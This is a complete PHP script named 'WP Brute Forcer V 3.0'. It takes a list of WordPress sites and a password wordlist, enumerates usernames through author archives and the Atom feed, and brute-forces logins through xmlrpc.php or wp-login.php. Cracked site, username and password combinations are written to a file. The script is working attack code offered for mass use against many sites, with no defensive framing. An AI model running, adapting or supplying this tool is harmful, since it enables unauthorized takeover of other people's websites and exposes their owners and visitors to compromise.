WP Brute Forcer V 3.0

<?php

error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '640000M');

echo"

[#]=============================[#]
[#]  WP Brute Forcer V 3.0      [#]
[#]                                            [#]
[#]  MaDe By Islam ..              [#]
[#]  Last Update : 26/5/2015    [#]
[#]=============================[#]

";

echo "\n(Enter Sites List) => ";
$list_s  = array_unique(@explode("\n",trim(@file_get_contents(trim(fgets(STDIN,1024))))));
$count_s = count($list_s);

echo "(Enter wordlist)   => ";
$pass_file = trim(fgets(STDIN,1024));

if(file_exists($pass_file)){
$list_w  = array_unique(@explode("\n",trim(@file_get_contents($pass_file))));
$count_w = @count($list_w);

         sleep(1);
         echo "\n[*] $count_s site and $count_w password loaded \n";
         sleep(1);
   echo "\n[*] Cracking ... \n\n";
}else{
         echo "[*] not found wordlist file \n";
   exit();
}

   function save($site,$user,$pass){
       $fo = fopen("jh.txt","a+");
       fwrite($fo,"[+] $site/wp-admin\n    $user:$pass\n\n");
       fclose($fo);    
      }
 
function curl($url,$POSTFIELDS = null,$headers = array()){
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_URL, $url);
 curl_setopt($ch2, CURLOPT_HTTPHEADER, $headers);
       curl_setopt($ch2, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
     curl_setopt($ch2, CURLOPT_HEADER, 0);
    curl_setopt($ch2, CURLOPT_TIMEOUT,10);
       curl_setopt($ch2, CURLOPT_CONNECTTIMEOUT,10);
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 1);
       curl_setopt($ch2, CURLOPT_COOKIEJAR,  getcwd()."./wp-cookie.txt");
       curl_setopt($ch2, CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
    curl_setopt($ch2, CURLOPT_ENCODING, "gzip, deflate, compress");
    curl_setopt($ch2, CURLOPT_POST, TRUE);
 curl_setopt($ch2, CURLOPT_POSTFIELDS, $POSTFIELDS);
     $exec = curl_exec($ch2);
     curl_close($ch2);
    return $exec;
    }
 
function admin_user($site){
    $guser = curl($site."/?feed=atom");
 $user2 = get_users($site);
    if(preg_match('#<name>(.*?)</name>#', $guser, $username22)){
    if(strlen($username22[1]) > 0 && strlen($username22[1]) <= 15)
    array_push($user2,$username22[1]);
 return array_unique($user2);
    }else{
       $guser = curl($site."/?author=1");
    if(preg_match('#<title>(.*?)</title>#', $guser, $username22)){
    $author = explode(' |', $username22[1]);
 array_push($user2,$author[0]);
    return array_unique($user2);
    }else
 array_push($user2,'admin');
    return array_unique($user2);
    }}

   function get_users($site){
    $c = 1; $u_arr = array();
       while(1){
 if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i',@file_get_contents($site.'/?author='.$c),$users))
   array_push($u_arr,$users[1]);
 else{
   return $u_arr;
   break;
 }
 $c++;
 }}
 
foreach($list_s as $site){
   $site = trim($site);

$admin_user  = admin_user($site);
$check = @get_headers($site."/xmlrpc.php");
$post_xmlrpc_f = "<methodCall>
                <methodName>wp.getUsersBlogs</methodName>
                <params>
                <param><value><string>adminnnn</string></value></param>
                <param><value><string>adminnnn</string></value></param>
                </params></methodCall>";
$headers_xmlrpc = array('Content-Type: application/x-www-form-urlencoded');  
$check_xmlrpc = curl($site."/xmlrpc.php",$post_xmlrpc_f,$headers_xmlrpc);      
$check_wp = curl($site."/wp-trackback.php");

if(preg_match("/need/i",$check_wp)){
 
 foreach($admin_user as $user){
     $user !== "admin" ? array_push($list_w,$user,$user."123",$user.$user,"123".$user) : false;

 if(preg_match("#200#",$check[0]) && !preg_match("#<string>parse error. not well formed</string>#i",$check_xmlrpc)){

   foreach($list_w as $pass){
       $pass = trim($pass);
 
       $isadmin       = '#<name>isAdmin</name>#';
       $post_xmlrpc_t = "<methodCall>
                       <methodName>wp.getUsersBlogs</methodName>
                       <params>
                       <param><value><string>$user</string></value></param>
                       <param><value><string>$pass</string></value></param>
                       </params></methodCall>";
     $login_xmlrpc = curl($site."/xmlrpc.php",$post_xmlrpc_t,$headers_xmlrpc);

 if(preg_match($isadmin,$login_xmlrpc)){
      echo "[+] Password is : $pass\n";
      save($site,$user,$pass);
      break;
 }else
      echo "[-] $site : ($user : $pass) => error\n";
      }}

 else{
   foreach($list_w as $pass){
       $pass = trim($pass);
       $login_post = "log=$user&pwd=$pass&wp-submit=Giriю&redirect_to=$site/wp-admin/&testcookie=1";
       $login = curl($site."/wp-login.php",$login_post);

     if(preg_match("#profile.php#i",$login)){
       echo "[+] Password is : $pass\n";
       save($site,$user,$pass);
       break;
      }else
     echo "[-] $site : ($user : $pass) => error\n";
}}}
while($count_w < count($list_w))
     array_pop($list_w);
}}

file_exists("wp-cookie.txt") ? unlink("wp-cookie.txt") : false;

?>